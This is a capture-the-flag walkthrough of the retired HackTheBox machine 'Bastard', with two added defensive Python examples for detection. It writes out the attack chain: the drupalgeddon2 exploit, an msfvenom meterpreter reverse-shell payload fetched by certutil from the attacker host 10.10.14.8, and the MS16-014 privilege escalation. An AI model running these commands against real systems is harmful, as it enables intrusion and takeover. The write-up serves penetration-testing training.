Bastard HackTheBox WalkThrough
This is the Bastard HackTheBox machine walkthrough, the 6th machine of our OSCP-like HTB boxes series. In this writeup, I demonstrate step by step how I rooted the Bastard HTB machine.
Before starting, let us know something about this machine. It is a Windows machine with IP address 10.10.10.9 and difficulty medium assigned by its maker. This machine is currently retired, so you will need a VIP subscription at hackthebox.eu to access it. Before starting, connect your PC to the VPN and confirm connectivity with the Bastard machine by pinging the IP 10.10.10.9. If all goes well, start hacking. As usual, I started by scanning the machine. I used Nmap [a popular port scanner] for this task and the result is below:
$ nmap -sC -sV -oN bastard.nmap 10.10.10.9
Nmap revealed that ports 80, 135 and 49154 are open: a Microsoft IIS 7 web server is running on port 80 and Microsoft RPC services on ports 135 and 49154. The Nmap script http-generator revealed that the website is built with Drupal CMS [Drupal is a Content Management System, like WordPress] and its major version is 7. As soon as I identify any software and its version, I immediately search for a public exploit using searchsploit. Searchsploit listed many potential exploits. However, with so many exploits we do not know which one will surely work. To filter for the most appropriate one, I had to know the exact version of the Drupal running on port 80. After some googling, I found this answer on Stack Overflow.
Going to the http://10.10.10.9/CHANGELOG.txt URL, I found that the installed version is 7.54.
Then I queried searchsploit again with the exact version, and this time it found 8 potential exploits.
$ searchsploit drupal 7.54
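The version disclosure above is something a site owner can audit for. The following is an added example (not from the original writeup or from Drupal) that parses the header of a Drupal 7 CHANGELOG.txt and flags a core version older than 7.58, the release that fixed SA-CORE-2018-002 (the bug behind drupalgeddon2); the sample CHANGELOG text is constructed, and the fix-version threshold is the editor's knowledge, not stated on the page.

```python
import re
from typing import Optional, Tuple

# The first release line of a Drupal 7 CHANGELOG.txt reads "Drupal 7.54, 2017-02-01".
VERSION_RE = re.compile(r"^Drupal (\d+)\.(\d+)(?:\.(\d+))?,")

# Drupal 7 release that shipped the SA-CORE-2018-002 fix (editor's knowledge,
# not taken from the walkthrough). Anything below this on the 7.x line is exposed.
DRUPALGEDDON2_FIXED = (7, 58)

# Constructed sample of what an exposed CHANGELOG.txt looks like (newest release first).
SAMPLE_CHANGELOG = """\
Drupal 7.54, 2017-02-01
-----------------------
- Modules are now able to declare dependencies on other modules.

Drupal 7.53, 2016-12-07
-----------------------
- Fixed a regression in the Path module.
"""


def parse_drupal_version(changelog_text: str) -> Optional[Tuple[int, ...]]:
    """Return the newest version listed in CHANGELOG.txt as an int tuple, or None
    when the text is not a Drupal changelog (e.g. a 404 page came back)."""
    for line in changelog_text.splitlines():
        match = VERSION_RE.match(line.strip())
        if match:
            return tuple(int(g) for g in match.groups() if g is not None)
    return None


def assess(changelog_text: str) -> dict:
    """Defender-side check: is CHANGELOG.txt readable, and if so does it reveal a
    7.x core older than the drupalgeddon2 fix? Other major lines are not judged."""
    version = parse_drupal_version(changelog_text)
    if version is None:
        return {"version": None, "exposed": False, "pre_fix_7x": None}
    pre_fix = version < DRUPALGEDDON2_FIXED if version[0] == 7 else None
    return {"version": version, "exposed": True, "pre_fix_7x": pre_fix}


if __name__ == "__main__":
    print(assess(SAMPLE_CHANGELOG))
```

The mitigation is the obvious one: remove or block CHANGELOG.txt (and similar metadata files) from the webroot, and keep core patched so the version is not worth hiding.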
After trying each of them, I found that only 44449.rb worked for me. For more info about this exploit, you can check here. Then I mirrored the exploit to my current directory using the -m switch of searchsploit.
$ searchsploit -m php/webapps/44449.rb
44449.rb uses DOS line endings, so I converted it to UNIX format using the command
$ dos2unix 44449.rb
I ran this exploit to get a user shell.
Getting User Shell
$ ruby 44449.rb
drupalgeddon2 >> whoami
Note: If you get the error shown in the screenshot, it is due to a missing gem named highline in your gem directory. To solve this problem, install the gem with the command $ sudo gem install highline
We got a user shell as the user named iusr. Right now we are in a fake cmd shell with limited functionality, and we cannot capture the user flag because this shell restricts execution of the type command. So I upgraded to a meterpreter shell by dropping a payload created with msfvenom onto the Bastard machine and then catching the shell on my listener in msfconsole.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.8 LPORT=4321 -f exe > shell.exe # This will create an exe payload on our local PC
$ python3 -m http.server 80 # Start a Python HTTP server to host this shell.exe file
drupalgeddon2 >> certutil.exe -urlcache -split -f "http://10.10.14.8/shell.exe" shell.exe # This will download the payload to the Bastard machine
I started the listener in msfconsole to get the reverse shell back:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.8
msf5 exploit(multi/handler) > set LPORT 4321
msf5 exploit(multi/handler) > exploit
meterpreter > sysinfo
We have successfully upgraded our shell to a meterpreter shell, which gives us many more options to work with.
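From the blue-team side, the download step above is a classic living-off-the-land pattern: a web-server worker spawning a shell, and certutil being used with -urlcache -f to fetch a file over HTTP. The following added example (not part of the original writeup) runs two such detection rules over constructed process-creation records modelled on Sysmon Event ID 1 fields; the parent image php-cgi.exe and the worker-binary list are assumptions, not details from the page.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style fields).
# The first command line mirrors the walkthrough's certutil download; the
# parent image is an assumed value, since the page does not show the process tree.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\inetpub\php\php-cgi.exe",
     "CommandLine": 'certutil.exe -urlcache -split -f "http://10.10.14.8/shell.exe" shell.exe'},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "certutil -verify cert.cer"},          # benign admin use
    {"Image": r"C:\Windows\System32\whoami.exe",
     "ParentImage": r"C:\inetpub\php\php-cgi.exe",
     "CommandLine": "whoami"},                              # web worker running recon
]

# Web-server worker binaries that should not normally spawn tools or shells (assumed list).
WEB_WORKERS = ("w3wp.exe", "php-cgi.exe", "httpd.exe")

# certutil used as a downloader: -urlcache followed later by -f and an http(s) URL.
URL_DOWNLOAD_RE = re.compile(r"-urlcache\b.*\B-f\s+\"?https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Windows path -> lowercase file name, so rules match regardless of directory."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event: dict) -> list:
    """Return the names of every rule that fires for one process-creation record."""
    hits = []
    if basename(event["Image"]) == "certutil.exe" and URL_DOWNLOAD_RE.search(event["CommandLine"]):
        hits.append("certutil_remote_download")
    if basename(event["ParentImage"]) in WEB_WORKERS:
        hits.append("web_worker_spawned_process")
    return hits


def scan(events: list) -> list:
    """Pair each alerting command line with the rules it triggered."""
    return [(e["CommandLine"], classify(e)) for e in events if classify(e)]


if __name__ == "__main__":
    for cmd, rules in scan(SAMPLE_EVENTS):
        print(f"{rules}: {cmd}")
```

In a real deployment the second rule is the higher-signal one: a Drupal worker executing whoami or certutil is anomalous regardless of the exact command line.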
Capture User Flag
meterpreter > cat 'C:\Users\dimitris\Desktop\user.txt'
To escalate privileges to admin, we first have to find a privilege escalation vector and then exploit it to get an admin shell. To find a PrivEsc vector I ran the post-exploitation module post/multi/recon/local_exploit_suggester, which lists the exploit modules that could be used to escalate privileges. Basically, it enumerates the potential kernel exploits whose patches are not installed on the Bastard machine.
Finding PrivEsc Vector
meterpreter > run post/multi/recon/local_exploit_suggester
Local Exploit Suggester listed 5 exploits that could be used to get an admin shell. I tried each of them one by one and only the exploit/windows/local/ms16_014_wmi_recv_notif module worked. So here the PrivEsc vector is a kernel exploit (MS16-014).
Getting Root Shell
meterpreter > background
msf5 exploit(multi/handler) > use exploit/windows/local/ms16_014_wmi_recv_notif
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set SESSION 1
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > set LHOST 10.10.14.8
msf5 exploit(windows/local/ms16_014_wmi_recv_notif) > exploit
meterpreter > getuid
We are now NT AUTHORITY\SYSTEM. Let us capture the root flag.
Capture Root Flag
meterpreter > cat /Users/Administrator/Desktop/root.txt.txt
This is how I rooted the Bastard HackTheBox machine. I learnt a lot hunting this box, and I hope you have also learnt something new from it. Thanks for reading this writeup. Share your experience in the comment section. For any suggestion or query related to the walkthrough, feel free to write to us at [email protected].
The next machine walkthrough is Arctic.